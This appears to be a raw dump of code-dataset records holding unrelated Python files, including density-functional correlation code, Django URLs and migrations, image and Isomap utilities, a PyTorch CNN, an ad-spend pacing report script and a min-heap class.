corpbe_rtpss(rs, zeta, T, phi, sk)\n\n beta_num = 1.0 + params['AFACTOR']*rs\n beta_den = 1.0 + params['BFACTOR']*rs\n beta = params['BETA_MB']*beta_num/beta_den\n\n phi3 = phi**3\n pon = -EC/(phi3*params['GAMMA'])\n w = np.exp(pon) - 1\n\n A = beta/(params['GAMMA']*w)\n V = A*T**2\n\n f_g = 1.0/np.power(1.0 + 4.0*V, 0.25)\n\n hcore = 1.0 + w*(1.0 - f_g)\n ah = params['GAMMA']*phi**3\n H = ah*np.log(hcore)\n\n return EC+H\n\n\ndef corpbe_rtpss(rs, zeta, T, phi, sk):\n GAM = 0.51984209978974632953442121455650 # 2^(4/3)-2\n FZZ = 8.0/(9.0*GAM)\n gamma = 0.031090690869654895034940863712730 # (1-log(2))/pi^2\n bet_mb = 0.066724550603149220\n sqrt_rs = np.sqrt(rs)\n\n EU, EURS = gcor2(0.03109070, 0.213700, 7.59570, 3.58760, 1.63820, 0.492940, sqrt_rs)\n EP, EPRS = gcor2(0.015545350, 0.205480, 14.11890, 6.19770, 3.36620, 0.625170, sqrt_rs)\n ALFM, ALFRSM = gcor2(0.01688690, 0.111250, 10.3570, 3.62310, 0.880260, 0.496710, sqrt_rs)\n\n ALFC = -ALFM\n Z4 = zeta**4\n\n # LDA part of the energy\n F = ((1.0 + zeta)**(4.0/3.0) + (1.0 - zeta)**(4.0/3.0) - 2.0)/GAM\n EC = EU*(1.0 - F*zeta**4) + EP*F*Z4 - ALFM*F*(1.0 - Z4)/FZZ\n\n # PBE correction\n bet = bet_mb*(1.0 + 0.1*rs)/(1.0 + 0.1778*rs)\n\n delt = bet/gamma\n phi3 = phi**3\n pon = 
-EC/(phi3*gamma)\n    B = delt/(np.exp(pon) - 1.0)\n    B2 = B**2\n    T2 = T**2\n    T4 = T**4\n    Q4 = 1.0 + B*T2\n    Q5 = 1.0 + B*T2 + B2*T4\n    H = phi3*(bet/delt)*np.log(1.0 + delt*Q4*T2/Q5) # Non-local part of correlation\n\n    return EC, H\n\n\ndef gcor2(A, A1, B1, B2, B3, B4, sqrtrs):\n    Q0 = -2.0*A*(1.0 + A1*sqrtrs*sqrtrs)\n    Q1 = 2.0*A*sqrtrs*(B1 + sqrtrs*(B2 + sqrtrs*(B3 + B4*sqrtrs)))\n    Q2 = np.log(1.0 + 1.0/Q1)\n    GG = Q0*Q2\n    Q3 = A*(B1/sqrtrs + 2.0*B2 + sqrtrs*(3.0*B3 + 4.0*B4*sqrtrs))\n    GGRS = -2.0*A*A1*Q2 - Q0*Q3/(Q1*(1.0 + Q1))\n    return GG, GGRS\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Beginning XCFun style SCAN implementation\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ndef getscan_x_both(params, d0, d1, g0, g1, t0, t1, weights):\n    e0 = getscan_x(params, 2*d0, 2*g0, 2*t0, weights)\n    e1 = getscan_x(params, 2*d1, 2*g1, 2*t1, weights)\n    return 0.5*(e0 + e1)\n\n\ndef getscan_c_both(params, d0, d1, g0, g1, t0, t1, weights):\n    zeta = (d0 - d1)/(d0 + d1)\n    e0 = getscan_c(params, d0, d1, np.abs(g0), np.abs(g1), t0, t1, zeta, weights)\n    return e0\n\n\ndef eps_c_0_high_dens_zeta_0(params, s):\n    \"\"\"\n    Assuming zeta = 0\n    \"\"\"\n\n    cx = -(3.0/(4.0*pi))*(9.0*pi/4.0)**(1.0/3.0)\n    beta_inf = params['BETA_RS_0']*params['AFACTOR']/params['BFACTOR']\n    chi_inf = (3.0*pi**2/16.0)**(2.0/3.0)*beta_inf/(cx - params['F0']) # checked\n    g_inf = 1.0/np.power(1.0 + 4*chi_inf*s**2, 1.0/4.0)\n    return params['B1C']*np.log(1.0 - g_inf*np.expm1(1)/np.exp(1))\n\n\n","sub_path":"SCANL.py","file_name":"SCANL.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426172243","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    # /dashboard/\n    path('', views.index, name='index'),\n    # /dashboard/1/\n    path('/', views.details, name='details'),\n    # /dashboard/1/edit/\n    path('/edit/', views.edit, name='edit'),\n    # /dashboard/add/\n    path('add/', views.add, name='add'),\n    # /dashboard/addnew/\n    path('addnew/', views.addnew, name='addnew'),\n]\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599616867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom base64 import b64decode, b64encode\n\nimport cv2\nimport numpy as np\nimport logging\n\nlogger = logging.getLogger(\"uvicorn.error\")\n\n\nclass InvalidDataURL(Exception):\n    def __str__(self):\n        return \"Invalid Data URL\"\n\n\nclass DataURLConvertError(Exception):\n    def __str__(self):\n        return \"Cannot convert to Data URL\"\n\n\ndef data_url_to_ndarray(data_url: str) -> np.ndarray:\n    \"\"\"\n    Convert a Data URL to an image (numpy.ndarray)\n\n    Parameters\n    ----------\n    data_url : str\n        Data URL\n\n    Returns\n    -------\n    np.ndarray\n        Numpy array holding the image data\n    \"\"\"\n\n    logger.debug(\"data_url: {}\".format(data_url[:20]))\n    _, b64_data = data_url.split(\",\")\n\n    img = cv2.imdecode(\n        np.frombuffer(\n            b64decode(b64_data),\n            dtype=np.uint8\n        ),\n        cv2.IMREAD_ANYCOLOR\n    )\n\n    if img is None:\n        raise InvalidDataURL()\n\n    return img\n\n\ndef ndarray_to_data_url(img: np.ndarray) -> str:\n    \"\"\"\n    Convert an image (numpy.ndarray) to a Data URL\n\n    Parameters\n    ----------\n    img : np.ndarray\n        Numpy array holding the image data\n\n    Returns\n    -------\n    str\n        Data URL\n    \"\"\"\n\n    DATA_URL_PREFIX = \"data:image/png;base64\"\n\n    success, img_data = cv2.imencode(\".png\", img)\n\n    if not success:\n        raise DataURLConvertError()\n\n    return 
\",\".join([\n DATA_URL_PREFIX,\n b64encode(img_data).decode(\"ascii\")\n ])\n","sub_path":"backend/lib/img_util.py","file_name":"img_util.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"106213405","text":"# Source: https://gist.github.com/Mashimo/b8a8d4dc18bf6875c8547134b543898f\n\n\"\"\"\n The ALOI, Amsterdam Library of Object Images, hosts a huge collection of 1000 small objects that were photographed in such a controlled \n environment, by systematically varying the viewing angle, illumination angle, and illumination color for each object separately. \n It can be accessed here: http://aloi.science.uva.nl/\n It shows that the isomap embedding appears to follow an easily traversable, 3D spline \n\"\"\"\nimport pandas as pd\n\nimport imageio as misc\n# from scipy import misc\nfrom sklearn import manifold\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # <--- This is important for 3d plotting ## Source: https://stackoverflow.com/questions/56222259/valueerror-unknown-projection-3d-once-again/56222305\n\nimport os\n\n# Look pretty...\nplt.style.use('ggplot')\n\n\n#\n# Start by creating a regular old, plain, \"vanilla\"\n# python list. \n#\nsamples = []\ncolours = []\n\n#\n# for-loop that iterates over the images in the\n# Datasets/ALOI/32/ folder, appending each of them to\n# your list. Each .PNG image should first be loaded into a\n# temporary NDArray.\n#\n# Optional: Resample the image down by a factor of two if you\n# have a slower computer. You can also convert the image from\n# 0-255 to 0.0-1.0 if you'd like, but that will have no\n# effect on the algorithm's results.\n#\ndirectory = \"./hw4/Datasets/ALOI/32/\"\nfor fname in os.listdir(directory):\n fullname = os.path.join(directory, fname)\n img = misc.imread(fullname)\n # samples.append( (img[::2, ::2] / 255.0).reshape(-1) ) RESAMPLE\n samples.append( (img).reshape(-1) )\n colours.append('b') # blue colour\n\n#\n# appends to your list the images\n# in the /Datasets/ALOI/32_i directory. \n#\ndirectory = \"./hw4/Datasets/ALOI/32i/\"\nfor fname in os.listdir(directory):\n fullname = os.path.join(directory, fname)\n img = misc.imread(fullname)\n # samples.append( (img[::2, ::2] / 255.0).reshape(-1) ) RESAMPLE\n samples.append( (img).reshape(-1) )\n colours.append('r') # red colour\n\n#\n# Convert the list to a dataframe\n#\ndf = pd.DataFrame( samples )\n\n\n#\n# Implement Isomap here. Reduce the dataframe df down\n# to three components, using K=6 for your neighborhood size\n#\niso = manifold.Isomap(n_neighbors=6, n_components=3)\niso.fit(df)\n\nmy_isomap = iso.transform(df)\n\n\n#\n# Create a 2D Scatter plot to graph your manifold. You\n# can use either 'o' or '.' as your marker. Graph the first two\n# isomap components\n#\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_title(\"ISO transformation 2D\")\n\nax.scatter(my_isomap[:,0], my_isomap[:,1], marker='.', c=colours)\n\n#\n# Create a 3D Scatter plot to graph your manifold. You\n# can use either 'o' or '.' 
as your marker:\n#\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.set_title(\"ISO transformation 3D\")\n\nax.scatter(my_isomap[:,0], my_isomap[:,1], my_isomap[:,2], marker='.', c=colours)\n\nplt.show()","sub_path":"hw4/research_purpose/isomap_aloi.py","file_name":"isomap_aloi.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15694269","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ActivityType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Patient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('email', models.EmailField(unique=True, max_length=70)),\n ('birth_date', models.DateField()),\n ('gender', models.CharField(max_length=2, choices=[(b'M', b'Male'), (b'F', b'Female')])),\n ('height', models.IntegerField(max_length=3)),\n ('weight', models.DecimalField(max_digits=6, decimal_places=3)),\n ('token', models.CharField(max_length=60)),\n ('updated', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProfessionalPatient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('patients', models.ManyToManyField(to='fitmodel.Patient')),\n ('professional', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Registry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='RegistryType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='registry',\n name='type',\n field=models.ForeignKey(to='fitmodel.RegistryType'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='activity',\n name='patient',\n field=models.ForeignKey(to='fitmodel.Patient'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='activity',\n name='type',\n field=models.ForeignKey(to='fitmodel.ActivityType'),\n preserve_default=True,\n ),\n ]\n","sub_path":"fitmodel/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"633293258","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import 
summary\n\n\nclass CNN(nn.Module):\n\n def __init__(self):\n super(CNN, self).__init__()\n self.pool1 = nn.MaxPool2d((2, 2))\n self.pool2 = nn.MaxPool2d((4, 4))\n self.drop_out1 = nn.Dropout2d(0.2)\n self.drop_out2 = nn.Dropout2d(0.4)\n\n self.conv1 = nn.Conv2d(in_channels=4, out_channels=32, kernel_size=(2, 2), stride=(1, 1), bias=True)\n self.batchnorm1 = nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(4, 4), stride=(1, 1), bias=True)\n self.batchnorm2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(in_channels=64, out_channels=256, kernel_size=(4, 4), stride=(1, 1), bias=True)\n self.batchnorm3 = nn.BatchNorm2d(256)\n\n self.input = nn.Linear(256*14*14, 256, True)\n self.fc1 = nn.Linear(256, 128, True)\n self.fc2 = nn.Linear(128, 64, True)\n self.out = nn.Linear(64, 3)\n\n def forward(self, x):\n\n x = self.pool1(F.relu(self.conv1(x)))\n x = self.batchnorm1(x)\n x = self.drop_out2(x)\n x = self.pool1(F.relu(self.conv2(x)))\n x = self.batchnorm2(x)\n x = self.drop_out2(x)\n x = self.pool2(F.relu(self.conv3(x)))\n x = self.batchnorm3(x)\n x = self.drop_out2(x)\n\n x = x.view(x.size()[0], -1)\n\n x = F.relu(self.input(x))\n x = self.drop_out2(x)\n x = F.relu(self.fc1(x))\n x = self.drop_out2(x)\n x = F.relu(self.fc2(x))\n x = self.drop_out1(x)\n x = self.out(x)\n return F.log_softmax(x, dim=1)\n","sub_path":"Projects/Build_week_3/cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563039612","text":"import os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.autograd import Variable\n\nimport configs\nfrom modules import data, action\nfrom modules.action import ActionModule\nfrom modules.agent import AgentModule\nfrom modules.game import GameModule\nfrom modules.predefined_utterances_module import PredefinedUtterancesModule\nfrom modules.utterance import Utterance\nfrom train import parser\n\n#to delete after testing utterance relvance\ncolors_dict = ['red', 'green', 'blue']\nshapes_dict = ['circle', 'triangle']\n\ndef main():\n args = vars(parser.parse_args())\n mode = args['mode']\n if mode == 'selfplay':\n selfplay = True\n else:\n selfplay = False\n one_sentence_mode = args['one_sentence_data_set']\n run_default_config = configs.get_run_config(args)\n folder_dir = run_default_config.folder_dir\n agent_config = configs.get_agent_config(args)\n game_config = configs.get_game_config(args)\n utterance_config = configs.get_utterance_config()\n training_config = configs.get_training_config(args, folder_dir)\n corpus = data.WordCorpus('data' + os.sep, freq_cutoff=20, verbose=True)\n agent = AgentModule(agent_config, utterance_config, corpus, run_default_config.creating_data_set_mode,\n run_default_config.create_utterance_using_old_code)\n utter = Utterance(agent_config.action_processor, utterance_config, corpus, run_default_config.create_utterance_using_old_code)\n if not mode == \"train_utter\":\n folder_dir_fb_model = utterance_config.fb_dir\n with open(folder_dir_fb_model, 'rb') as f:\n utter.load_state_dict(torch.load(f))\n action = ActionModule(agent_config.action_processor, utterance_config, corpus, run_default_config.create_utterance_using_old_code)\n create_data_set = PredefinedUtterancesModule()\n if one_sentence_mode:\n num_agents = np.random.randint(game_config.min_agents,\n game_config.max_agents + 1)\n num_landmarks = np.random.randint(game_config.min_landmarks,\n 
game_config.max_landmarks + 1)\n agent.reset()\n game = GameModule(game_config, num_agents, num_landmarks, folder_dir)\n df_utterance = [pd.DataFrame(index=range(game.batch_size), columns=agent.df_utterance_col_name\n , dtype=np.int64) for i in range(game.num_agents)]\n iter = random.randint(0, game.time_horizon)\n df_utterance = create_data_set.generate_sentences(game, iter, df_utterance, one_sentence_mode, mode=mode)\n for epoch in range(training_config.num_epochs):\n if not one_sentence_mode:\n num_agents = np.random.randint(game_config.min_agents,\n game_config.max_agents + 1)\n num_landmarks = np.random.randint(game_config.min_landmarks,\n game_config.max_landmarks + 1)\n agent.reset()\n game = GameModule(game_config, num_agents, num_landmarks, folder_dir)\n df_utterance = [pd.DataFrame(index=range(game.batch_size), columns=agent.df_utterance_col_name\n ,dtype=np.int64) for i in range(game.num_agents)]\n iter = random.randint(0, game.time_horizon)\n df_utterance = create_data_set.generate_sentences(game, iter, df_utterance, one_sentence_mode, mode=mode)\n agent_num = random.randint(0, game.num_agents-1)\n physical_feat = agent.get_physical_feat(game, agent_num)\n mem = Variable(torch.zeros(game.batch_size, game.num_agents,game_config.memory_size)[:, agent_num])\n utterance_feat = torch.zeros([game.batch_size, 1, 256], dtype=torch.float)\n goal = game.observed_goals[:, agent_num]\n processed, mem = action.processed_data(physical_feat, goal, mem,\n utterance_feat)\n if selfplay and one_sentence_mode:\n processed = torch.load(args['folder_dir']+os.sep+'processed.pt')\n elif not selfplay and one_sentence_mode:\n torch.save(processed, args['folder_dir']+os.sep+'processed.pt')\n full_sentence = df_utterance[agent_num]['Full Sentence' + str(iter)]\n\n if selfplay:\n loss, utterance, _ = utter(processed, full_sentence, epoch=epoch)\n with open(folder_dir + os.sep + \"utterance_selfplay_annotation.csv\", 'a', newline='') as f:\n for index in range(len(utterance)):\n f.write(' '.join(corpus.word_dict.i2w(utterance[index].data.cpu())))\n f.write(\" \" + 'agent_color' + \" \" + colors_dict[df_utterance[agent_num]['agent_color'][index]])\n f.write(\" \" + 'agent_shape' + \" \" + shapes_dict[df_utterance[agent_num]['agent_shape'][index]])\n f.write(\" \" + 'lm_color' + \" \" + colors_dict[df_utterance[agent_num]['lm_color'][index]])\n f.write(\" \" + 'lm_shape' + \" \" + shapes_dict[df_utterance[agent_num]['lm_shape'][index]])\n f.write('\\n')\n else:\n loss, utterance, folder_dir = utter(processed, full_sentence, epoch=epoch)\n with open(folder_dir + os.sep + \"utterance_out_fb.csv\", 'a', newline='') as f:\n f.write(\"-----\")\n f.write(full_sentence[1])\n f.write(\"----\")\n f.write(colors_dict[df_utterance[agent_num]['agent_color'][1]])\n f.write(\" \" + str(df_utterance[agent_num]['dist'][1]))\n f.write(\" \" + str(iter))\n f.write('\\n')\n if mode == 'train_utter':\n with open(training_config.save_model_file, 'wb') as f:\n torch.save(utter.state_dict(), f)\n print(\"Saved agent model weights at %s\" % training_config.save_model_file)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train_utter.py","file_name":"train_utter.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636030249","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 26 14:34:00 2017\n\n@author: apogee_tpaschke\n\"\"\"\n\n\nimport pandas as pd \nimport pickle \nimport numpy as np \nimport 
pprint\n\nfile = 'Copy_of_FMJ_Spend_MTD_2017-04-27-1217.csv'\nfile2 = 'SDF-LineItems 6.csv'\n \nday = file[22:32]\nmtd = int(file[30:32])- 19\ndays_total = 20\n\n\nmonth = day[5:7]\nda = day[8:10]\nda = int(da)\nda = da -1 \ndate = '2017/'+month+\"/\"+str(da)\n\n\ndf = pd.read_csv('/Users/apogee_tpaschke/Downloads/'+file, error_bad_lines=False , low_memory = False)\ndf2 = pd.read_csv('/Users/apogee_tpaschke/Downloads/'+file2, error_bad_lines=False , low_memory = False)\n\n\ndf = df.drop(df.index[[-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16]])\n\n\n#only keep the columns we care about \nkeep_col = [ 'Date'\n ,'Advertiser'\n ,'Line Item ID'\n ,'Line Item'\n ,'Impressions'\n ,'Total Conversions'\n ,'Total Media Cost (Advertiser Currency)']\n\nkeep_col_2 = [ 'Line Item Id'\n ,'Name'\n ,'Budget Amount'\n ,'Frequency Exposures'\n ,'Bid Strategy Value']\n\n\n\n\n\ndf = df[keep_col]\ndf2 = df2[keep_col_2]\n\ndf = df.rename(columns={'Total Media Cost (Advertiser Currency)': 'Media Cost'})\ndf2 = df2.rename(columns={'Budget Amount': 'Line Item Budget'})\ndf2 = df2.rename(columns={'Name': 'Line Item'})\n\nkeep_col_3 =['Line Item'\n ,'Media Cost']\n\nli = df.groupby(['Date','Line Item'], as_index=False).sum()\nli = li.loc[li['Date'] == str(date)]\nli = li[keep_col_3]\nli = li.rename(columns={'Media Cost': 'Spend Yesturday'})\nli = li.sort_values(['Spend Yesturday'], ascending=False)\nLI = df.groupby(['Line Item'], as_index=False).sum()\n\nLI = pd.merge(LI,df2, on =['Line Item'], how ='left')\nLI = pd.merge(LI,li, on=['Line Item'], how='left')\nLI = LI.rename(columns={'Frequency Exposures': 'LI Frequency'})\nLI = LI.rename(columns={'Bid Strategy Value': 'Bid Price'})\nLI = LI.append(LI.sum(numeric_only=True), ignore_index=True)\n\n#compute how many days remain and make add a new column to the dataframe\ndays_in = len(set(df['Date']))\ndays_left = days_total - days_in\nLI['Days Remaining'] = days_left\nLI['Budget Remaining'] = LI['Line Item Budget'] - LI['Media Cost']\nLI['Daily Spend Required'] = LI['Budget Remaining']/LI['Days Remaining']\nLI['Average Daily Spend'] = LI['Media Cost']/days_in\nLI['Average Daily Pace'] = LI['Average Daily Spend'] - LI['Daily Spend Required']\nLI['Yesturday Pace Deficit'] = LI['Spend Yesturday'] - LI['Daily Spend Required']\nLI = LI.sort_values(['Line Item Budget'], ascending=False)\n\nLI = LI[['Line Item',\t'Impressions',\t'Total Conversions',\t'Media Cost',\t'Line Item Budget',\t'LI Frequency',\t'Bid Price',\t'Days Remaining',\t'Budget Remaining','Spend Yesturday',\t'Daily Spend Required',\t'Average Daily Spend',\t'Average Daily Pace', 'Yesturday Pace Deficit']]\nLI.set_index('Line Item', inplace=True)\n\n\n#Output each dataframe to a seperate sheet in excel \nwriter = pd.ExcelWriter('/Users/apogee_tpaschke/Documents/FMJ_Daily_Pace/Daily_Pace'+day+'.xlsx', engine='xlsxwriter') \n#write each dataframe to a different worksheet \nLI.to_excel(writer, sheet_name='Pacing')\n\nworkbook = writer.book\nworksheet1=writer.sheets['Pacing']\nformat1 = workbook.add_format({'num_format': '#,##0'})\nformat2 = workbook.add_format({'num_format': '0.00%'}) \nformat3 = workbook.add_format({'num_format': '$#,##0.00'})\n\nworksheet1.set_column('A:A', 44, None)\nworksheet1.set_column('B:B', 12, format1)\nworksheet1.set_column('C:C', 16, format1)\nworksheet1.set_column('D:D', 12, format3)\nworksheet1.set_column('E:E', 15, format3)\nworksheet1.set_column('F:F', 10, format1)\nworksheet1.set_column('G:G', 8, format3)\nworksheet1.set_column('H:H', 12, 
format1)\nworksheet1.set_column('I:I', 15, format3)\nworksheet1.set_column('J:J', 17, format3)\nworksheet1.set_column('K:K', 17, format3)\nworksheet1.set_column('L:L', 17, format3)\nworksheet1.set_column('M:M', 17, format3)\nworksheet1.set_column('N:N', 17, format3)\n\nwriter.save()\n\n#print(LI)\n\n\n\n\n\n\n\n#df = df.drop(df.in","sub_path":"FJM_Pacing.py","file_name":"FJM_Pacing.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14485576","text":"from scout.dao.space import get_spots_by_filter, _get_spot_filters, \\\n _get_extended_info_by_key\nimport copy\n\n\ndef get_item_by_id(item_id):\n spot = get_spots_by_filter([\n ('item:id', item_id),\n ('extended_info:app_type', 'tech')\n ])\n if spot:\n spot = _filter_spot_items(item_id, spot[0])\n return spot\n\n\ndef _filter_spot_items(item_id, spot):\n for item in spot.items:\n if item.item_id == item_id:\n spot.item = item\n return spot\n\n\ndef add_item_info(spot):\n for item in spot.items:\n item.model = _get_extended_info_by_key(\"i_model\",\n item.extended_info)\n item.brand = _get_extended_info_by_key(\"i_brand\",\n item.extended_info)\n item.checkout_period = _get_extended_info_by_key(\n \"i_checkout_period\",\n item.extended_info\n )\n item.has_access_restriction = _get_extended_info_by_key(\n \"i_has_access_restriction\",\n item.extended_info\n )\n item.access_limit_role = _get_extended_info_by_key(\n \"i_access_limit_role\",\n item.extended_info\n )\n item.access_role_students = _get_extended_info_by_key(\n \"i_access_role_students\",\n item.extended_info\n )\n item.reservation_required = _get_extended_info_by_key(\n \"i_reservation_required\",\n item.extended_info\n )\n item.is_active = _get_extended_info_by_key(\n \"i_is_active\",\n item.extended_info\n )\n item.quantity = _get_extended_info_by_key(\n \"i_quantity\",\n item.extended_info\n )\n item.description = _get_extended_info_by_key(\n \"i_description\",\n item.extended_info\n )\n item.reserve_url = _get_extended_info_by_key(\n \"i_reserve_url\",\n item.extended_info\n )\n item.manual_url = _get_extended_info_by_key(\n \"i_manual_url\",\n item.extended_info\n )\n return spot\n\n\ndef get_filtered_items(spots, request):\n parameter_list = _get_spot_filters(request)\n brand = []\n subcategory = []\n for param in parameter_list:\n if param[0] == \"item:extended_info:i_brand\":\n brand.append(param[1])\n elif param[0] == \"item:subcategory\":\n subcategory.append(param[1])\n\n if len(brand) <= 0 and len(subcategory) <= 0:\n return spots\n\n newSpots = []\n\n for spot in spots:\n newSpot = copy.deepcopy(spot)\n newSpot.items = []\n for item in spot.items:\n if item.subcategory in subcategory:\n newSpot.items.append(item)\n else:\n if item.brand in brand:\n newSpot.items.append(item)\n newSpots.append(newSpot)\n return newSpots\n\n\ndef get_item_count(spots):\n item_count = 0\n for spot in spots:\n item_count += len(spot.items)\n return item_count\n","sub_path":"scout/dao/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490226072","text":"import heapq\n\ndef solution(n, costs):\n answer = 0\n dis = [[] for _ in range(n)]\n \n for cost in costs:\n s, e, cnt = map(int, cost)\n dis[s].append([e, cnt])\n dis[e].append([s, cnt])\n \n def find(start):\n D = [[-1, 0x9999999] for _ in range(n)]\n\n D[start][0] = start\n D[start][1] = 0\n \n q = []\n 
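        # [editor's note, added] heapq keeps a binary min-heap, and Python tuples
        # compare element-wise, so the (cost, node) pairs pushed below make heappop
        # return the cheapest frontier entry first. The file name ("섬 연결하기(실패)" =
        # "connect islands (failed)") marks this attempt as unsuccessful; a likely
        # reason is that this Dijkstra-style pass from node 0 minimizes path costs
        # from a single source, whereas the problem asks for a minimum spanning
        # tree (e.g. Kruskal with union-find, or Prim).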
heapq.heappush(q, (0, start))\n \n while q:\n now, cnt = heapq.heappop(q)\n if D[now][1] < cnt:\n continue\n for i in dis[now]:\n cost = i[1]\n \n if cost < D[i[0]][1]:\n D[i[0]][1] = cost\n D[i[0]][0] = now\n heapq.heappush(q, (cost, i[0]))\n \n print(D)\n return D\n \n D = find(0)\n for d in D:\n answer += d[1]\n \n return answer\n\n # heapq.heappush(heap, (-num, num)) # (우선 순위, 값)\n # heapq.heappop(heap)[1]) ","sub_path":"이혜은/0923/섬 연결하기(실패).py","file_name":"섬 연결하기(실패).py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32049637","text":"\"\"\"\r\n@author Gabriela Melo\r\n@since 21/05/2015\r\n\"\"\"\r\n\r\nclass MinHeap:\r\n\tdef __init__(self):\r\n\t\tself.count = 0\r\n\t\tself.array = [None]\r\n\r\n\tdef __len__(self):\r\n\t\treturn self.count\r\n\r\n\tdef is_empty(self):\r\n\t\t'''\r\n returns whether the amount of items in the heap is 0\r\n :return: boolean\r\n :complexity: O(1)\r\n '''\r\n\t\treturn self.count == 0\r\n\r\n\tdef append(self, item):\r\n\t\t'''\r\n adds a new item to the heap\r\n :param item: a list of any object type, except for item[0] which contains the key, that must be an integer\r\n :complexity: best = O(1), worst = O(log N), where N = depth of heap\r\n '''\r\n\t\ttry:\r\n\t\t\tint(item[0])\r\n\t\texcept ValueError:\r\n\t\t\tprint('Key needs to be an integer')\r\n\t\ttry:\r\n\t\t\tself.array[self.count+1] = item\r\n\t\texcept IndexError:\r\n\t\t\tself.array.append(item)\r\n\r\n\t\tself.count += 1\r\n\t\tself.rise(self.count)\r\n\r\n\tdef appendAtEnd(self, value):\r\n\t\tself.array.append[self.count+1] = [self.array[self.count][0]+1, value]\r\n\r\n\r\n\tdef rise(self, k):\r\n\t\t'''\r\n\t\tbrings item of key k to the position where it belongs\r\n\t\t:param k: integer, position of item\r\n\t\t:complexity: best = O(1), worst = O(log k)\r\n\t\t'''\r\n\t\twhile k//2 > 0:\r\n\t\t\tif self.array[k][0] >= self.array[k//2][0]:\r\n\t\t\t\tbreak\r\n\t\t\tself.swap(k, k//2)\r\n\t\t\tk = k//2\r\n\r\n\tdef swap(self, i, j):\r\n\t\t'''\r\n\t\tswaps two elements in an array\r\n\t\t:param i, j: integers, position of items to be swaped\r\n\t\t:complexity: O(1)\r\n\t\t'''\r\n\t\ttemp = self.array[i]\r\n\t\tself.array[i] = self.array[j]\r\n\t\tself.array[j] = temp \r\n\r\n\tdef __str__(self):\r\n\t\tstring = '' \r\n\t\tfor i in range(self.count):\r\n\t\t\tstring += str(self.array[i+1])\r\n\t\treturn string\r\n\r\n\tdef serve(self):\r\n\t\t'''\r\n\t\treturns item of smallest key in the heap\r\n\t\t:return: item of any type\r\n\t\t:complexity: best = O(1), worst = O(log N), where N = depth of heap\r\n\t\t'''\r\n\t\tassert not self.is_empty(), \"Can't serve from empty list\"\r\n\t\titem = self.array[1]\r\n\t\tself.swap(1, 